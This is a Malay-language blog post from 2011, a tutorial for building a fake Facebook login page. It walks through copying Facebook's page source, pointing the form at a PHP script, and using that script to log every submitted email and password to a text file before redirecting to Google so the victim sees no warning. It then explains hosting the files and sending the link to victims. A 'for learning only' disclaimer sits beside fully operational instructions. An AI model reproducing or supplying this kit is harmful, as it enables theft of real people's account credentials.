Sunday, 27 November 2011

Tutorial Phishing


Apa itu phishing? Phising adalah salah satu taktik penggodam untuk mendapat email dan password sesuatu akaun seperti facebook, twitter, blog dan banyak lagi. macam mana ianya berfungsi?

seorang penggodam akan menghantar satu link phising mereka dimana apabila anda tekan link tersebut, anda akan di halakan ke website tertentu seperti facebook, twitter, blog tetapi sebenarnya ianya bukanlah website yang asal.

jadi, apabila anda login ke website palsu yang serupa dengan website asal, maka anda secara rasminya telah menyerahkan maklumat akaun anda kepada penggodam tersebut..

so, hari ini adam ingin berkongsi ilmu bagaimana cara untuk membuat phishing ini. Ini adalah tujuan untuk pembelajaran sahaja. segala maklumat yang anda terima dan anda lakukan adalah di bawah risiko anda sendiri..
apa yang kita perlu ada untuk phishing ini adalah file .html dan .php

1. anda buka laman web yang anda ingin buat phising itu (selalunya facebook, twitter dan blog). sebagai contoh lah, kita ingin membuat phishing untuk facebook. buka website facebook (www.facebook.com)  dan tekan "right click" dan tekan "view page source"

2. Copy code yang terdapat pada source yang dipaparkan setelah anda klik "view page source" tadi. Copy semua source code itu dan paste di notepad. selepas itu tekan CTRL + A dan CTRL + F dan search 'action' dan anda akan dapat seperti dibawah..

action="https://www.facebook.com/login.php?login_attempt=1"

3. Tukarkan link yang berwarna merah diatas  kepada action="lol.php"  dan selepas itu tekan file > save as > index.html

sekarang anda baru selesai membuat file .html

4. langkah seterusnya ialah anda copy code dibawah ini


header ('Location:https://www.google.com');
$handle = fopen("username.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>  

sekiranya anda menghadapi masalah untuk copy sila copy di sini : http://tinypaste.com/2ee9d544 (password : adamfikri.com)
paste di notepad dan selepas itu tekan file > save as > lol.php

pasti anda tertanya-tanya kenapa www.google.com??
ini kerana sekiranya anda meletakkan www.facebook.com , facebook akan mengeluarkan warning selepas mangsa log in kepada link phishing kita. facebook kini sudah upgrade mereka punya security.

sekarang kita sudah siap file .html kita dengan .php kita. apa yang perlu anda lakukan adalah dengan uploadkan file anda ke free host web. anda boleh search mana free host web menggunakan google. uploadkan file .html dan .php anda ke free host web pilihan anda.

selepas siap upload kedua-dua file tersebut, tekan index.html dan akan keluar fake login facebook kita. anda ambil link tersebut dan sebarkan kepada mangsa kita. selepas mangsa log in menggunakan link phishing kita , secara automatik akn keluar file baru username.txt ataupun password.txt di mana email n password mangsa ada dlm tu. tetapi anda perlu refresh dahulu apabila seseorang mangsa log in kedalam phishing anda.

selamat mencuba!

p/s : ilmu phishing ini adam tidak galakkan untuk digunakan. gunakan untuk tujuan kebaikan bukan untuk mengenakan orang. setiap ilmu yang ada di dunia perlu di kongsi kerana memang menjadi tugas kita untuk menuntuk ilmu. manfaatkan ilmu yang ada kejalan yang betul.

warning : ini adalah tujuan untuk pembelajaran sahaja. adam tidak akan bertanggung jawab i atas sebarang masalah yang berlaku disebabkan ilmu dan maklumat yang terdapat didalam blog ini. semuanya dibawah risiko anda sendiri..

Sumber : Infexious Joker

1 Comments: